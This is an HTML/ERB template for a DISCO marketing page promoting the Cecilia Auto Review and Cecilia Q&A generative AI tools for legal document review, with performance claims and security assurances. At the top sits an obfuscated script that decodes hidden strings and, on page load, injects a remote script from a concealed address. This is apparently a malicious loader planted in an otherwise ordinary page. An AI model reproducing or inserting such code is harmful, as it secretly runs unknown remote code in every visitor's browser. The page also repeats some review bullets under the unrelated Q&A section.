<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "relativity/relair-hero.webp", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <div class="heading-decorated heading-decorated_center text-center">
                    <%= image_tag 'cecilia-white.png', class: 'img-fluid', style: 'width: 30rem;' %>
                </div>            
                <h5 class="mt-4">Accelerate Document Review With Generative AI</h5>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-center">
      <div class="col-10">
        <article class="post-wide">
          <h5 class="text-primary mb-2"><strong>First Pass Review In A Fraction Of The Time</strong></h5>
          <p>Cecilia Auto Review delivers exceptional performance metrics that dramatically outpace traditional review methods: </p>
            
          <div class="row">
            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
              <div class="icon-lg text-primary linear-icon-power"></div>
              <h5 class="blurb-tiny__title text-primary"><strong>Unprecedented Speed</strong></h5>
              <p>Review 25,000 documents per hour – equivalent to a 500-person review team working around the clock. </p>
            </article>

            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
                <div class="icon-lg text-primary linear-icon-users"></div>
                <h5 class="blurb-tiny__title text-primary"><strong>Expert Collaboration</strong></h5>
                <p>Partner with DISCO’s AI consulting team to craft tag descriptions optimized to deliver high recall and precision rates in your specific matter.</p>
            </article>

            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
              <div class="icon-lg text-primary linear-icon-check"></div>
              <h5 class="blurb-tiny__title text-primary"><strong>Complete Transparency</strong></h5>
              <p>View and export detailed explanations for all AI tagging decisions, including issue tags, on every reviewed document. </p>
            </article>
          </div>
        </article>
      </div>
    </div>
  </div>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-center">
      <div class="col-10">
        <article class="post-wide">
          <h5 class="text-primary mb-2"><strong>Managed by experts</strong></h5>
          <p>DISCO partners with every customer to ensure high-quality results that meet defensibility requirements. Our Auto Review offering includes: </p>
           
          <div class="row">
            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
              <div class="icon-lg text-primary linear-icon-compass2"></div>
              <h5 class="blurb-tiny__title text-primary"><strong>Strategic Guidance</strong></h5>
              <p>Recommendations on workflow and process, including sampling and validation that leverage industry best practices.</p>
            </article>

            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
                <div class="icon-lg text-primary linear-icon-refresh"></div>
                <h5 class="blurb-tiny__title text-primary"><strong>Continuous Improvement</strong></h5>
                <p>Iterative refinement of tag descriptions to continuously improve performance.</p>
            </article>

            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
              <div class="icon-lg text-primary linear-icon-shield-check"></div>
              <h5 class="blurb-tiny__title text-primary"><strong>Defensibility Support</strong></h5>
              <p>Collaboration on defensibility letters for opposing parties, courts, or government agencies.</p>
            </article>
          </div>
        </article>
      </div>
    </div>
  </div>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row justify-content-center">
      <div class="col-10">
        <h5 class="text-primary"><strong>The Cecilia Auto Review process</strong></h5>
        <%= image_tag "cecilia-process.png", class:"mt-4 mb-4" %>
        <!-- -->
        <div class="bg-gray-lighter p-5" style="border-radius: 5px;">
          <article class="post-wide">
            <div class="row mt-3">
              <div class="col-12 col-md-6 mb-4">
                <ul class="list-marked">
                  <li>Create tag descriptions and test them on a sample document set, adjusting as needed until recall and precision rates meet your requirements – similar to traditional technology-assisted review workflows.</li>
                  <li>Make tagging decisions with confidence by referencing the detailed explanations Cecilia provides for each prediction.</li>
                </ul>
              </div>
              <div class="col-12 col-md-6 mb-4">
                <ul class="list-marked">
                  <li>Receive ongoing support from DISCO’s AI consulting team throughout the entire process.</li>
                  <li>Documents requiring privilege review or Auto Review exclusions will be reviewed by the DISCO Review Team.</li>
                </ul>
              </div>
            </div>
          </article>
        </div>
      </div>
    </div>
  </div>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row justify-content-center">
      <div class="col-10" style="border-radius:3px">
      <h5 class="text-primary"><strong>Proven Results</strong></h5>
      <p>How leading firms are transforming review processes with Cecilia Auto Review</p>
      
        <div class="d-flex flex-column flex-md-row align-items-center text-md-start p-4">
          <div class=" mb-3 mb-md-0">
            <i class="linear-icon-magnifier icon-md" style="font-size:2rem; color:#2367A3;"></i>
          </div>

          <div class=" mx-md-3 my-3 my-md-0" style="flex-shrink: 0;">
            <div class="line line-vertical"></div>
            <div class="line line-horizontal" ></div>
          </div>

          <div>
            <p>
                <strong class="text-primary">Streamlining first-pass review:</strong> A team of ediscovery experts 
                at an Am Law 50 firm evaluated Auto Review and found it particularly valuable in fast-moving investigations. 
                A first-pass review for issue tags that would traditionally require 1,000 hours using legacy workflows can now 
                be completed in less than 24 hours with Cecilia Auto Review – with superior results compared to conventional methods.
            </p>
          </div>
        </div>

        <div class="d-flex flex-column flex-md-row align-items-center text-md-start p-4">
          <div class=" mb-3 mb-md-0">
            <i class="linear-icon-list icon-md" style="font-size:2rem; color:#2367A3;"></i>
          </div>

          <div class=" mx-md-3 my-3 my-md-0" style="flex-shrink: 0;">
            <div class="line line-vertical"></div>
            <div class="line line-horizontal"></div>
          </div>

          <div>
            <p><strong class="text-primary">Conducting Precise Issue Review</strong> An Am Law 50 firm used Cecilia Auto Review 
            to identify documents with a specific issue tag, achieving 92% recall and precision with a total agreement rate of 97%. 
            When the case team re-reviewed disagreements, they discovered that Cecilia was actually correct 78% of the time just on 
            those disagreements — a precision rate that is still higher than typical human review.</p>
          </div>
        </div>

        <div class="d-flex flex-column flex-md-row align-items-center text-md-start p-4">
          <div class=" mb-3 mb-md-0">
            <i class="linear-icon-graph icon-md" style="font-size:2rem; color:#2367A3;"></i>
          </div>

          <div class=" mx-md-3 my-3 my-md-0" style="flex-shrink: 0;">
            <div class="line line-vertical"></div>
            <div class="line line-horizontal" ></div>
          </div>

          <div>
            <p><strong class="text-primary">Quickly Analyzing Incoming Productions</strong>  In time-sensitive litigation, 
            rapidly interpreting incoming productions is critical. In one case, a first-pass review that required human reviewers 
            435 hours (five calendar days) was completed by Cecilia Auto Review in just 7 hours — with a recall rate of 97%. 
            This efficiency allows legal teams to achieve more with smaller teams and begin fact development and case strategy earlier.
            </p>
          </div>
        </div>

        <div class="d-flex flex-column flex-md-row align-items-center text-md-start p-4">
          <div class=" mb-3 mb-md-0">
            <i class="linear-icon-clock icon-md" style="font-size:2rem; color:#2367A3;"></i>
          </div>

          <div class=" mx-md-3 my-3 my-md-0" style="flex-shrink: 0;">
            <div class="line line-vertical"></div>
            <div class="line line-horizontal" ></div>
          </div>

          <div>
            <p><strong class="text-primary">Meeting Tight Deadlines</strong>  Facing an imminent production deadline, 
            a case team at an Am Law 50 firm utilized Cecilia Auto Review to expedite their review process and identify 
            their production set with 88% precision and 84% recall rates. After experiencing time savings of at least 50%, 
            one attorney remarked,“I absolutely want to use this on future cases.”
            </p>
          </div>
        </div>

      </div>
    </div>
  </div>
</section>

<div class="d-flex justify-content-center">
    <div class="divider-blue my-5"></div>
</div>

<section class="section">
  <div class="container">
    <div class="row justify-content-center text-center">
      <div class="col-12 col-md-10">
        <h3 class="text-primary pt-5"><strong>DISCO Ediscovery: Cecilia Q&A</strong></h3>
        <h6 class="mb-5" style="font-size:1.25rem;">
          Interrogate your evidence with your own GenAI fact expert
        </h6>
      </div>
    </div>
    <div class="row justify-content-center mb-5">
      <div class="col-12 col-md-10">
        <h5 class="text-primary mb-3"><strong>How Cecilia Q&A Works:</strong></h5>
        <p class="col-md-12 px-0">
          <strong class="text-primary">Ask a question</strong> about a concept, custodian, or claim that you want to know more about. <br>
          <strong class="text-primary">Receive an answer</strong> in plain English, based entirely on the information within your database,
          with citations to the underlying sources that can be quickly referenced or tagged for additional analysis.
        </p>
      </div>
    </div>
    <div class="row justify-content-center mb-5">
      <div class="col-12 col-md-10">
        <h5 class="text-primary mb-3"><strong>A Fact Expert That’s With You At Every Stage</strong></h5>
        <div class="row">
          <div class="col-md-6 mb-3">
            <ul class="list-marked">
              <li>Create tag descriptions and test them on a sample document set, adjusting as needed until recall and precision rates meet your requirements – similar to traditional technology-assisted review workflows.</li>
            </ul>
          </div>
          <div class="col-md-6 mb-3">
            <ul class="list-marked">
              <li>Make tagging decisions with confidence by referencing the detailed explanations Cecilia provides for each prediction.</li>
            </ul>
          </div>
        </div>
      </div>
    </div>
    <div class="row justify-content-center">
      <div class="col-12 col-md-10">
        <h5 class="text-primary mb-3"><strong>Unlock Even More With Cecilia</strong></h5>
        <p class="mb-4">
          Cecilia Q&A gives you unlimited access to two additional GenAI tools: Cecilia Q&A (single-doc) and Cecilia doc summaries.
        </p>
        <h6 class="text-primary mb-3"><strong>These features empower your team to:</strong></h6>
        <div class="row">
          <div class="col-md-6 mb-3">
            <ul class="list-marked">
              <li>Quickly and easily extract key information from relevant documents identified using Cecilia Q&A</li>
              <li>Create plain-English recaps of contracts, reports, or even foreign language documents, directly within the document viewer and entirely on-demand</li>
            </ul>
          </div>
          <div class="col-md-6 mb-5">
            <ul class="list-marked">
              <li>Ask questions about individual documents to clarify concepts, pinpoint relevant excerpts or provisions, QC tagging decisions before production, and more</li>
              <li>Generate work product from particular documents, like a list of defined entities, an outline of questions for a deposition, or a summary in the form of a timeline</li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<section class="section-lg bg-gray-lighter">
  <div class="container">
    <div class="row justify-content-center">
      <div class="col-10">
        <h5 class="text-primary"> <strong>Trusted Security</strong> </h5>
        <p>We design and manage our global infrastructure with security in mind. DISCO Ediscovery is SOC2 Type 2 
        and ISO 27001 certified. We maintain measures to comply with applicable data protection frameworks such as the 
        GDPR. The LLMs used in Cecilia AI are not permitted to train on customer data and usage, and they are not permitted 
        to retain customer data after being queried and returning a response. LLM vendors are required to meet DISCO’s SOC Type 2 
        and/or ISO 27001 product certifications. We regularly evaluate and update the LLMs used in our products. A current list of 
        the subprocessors DISCO uses, including the LLMs that have passed our rigorous testing standards, is available online 
        at: csdisco.com/subprocessors.</p>
      </div>
    </div>
  </div>
</section>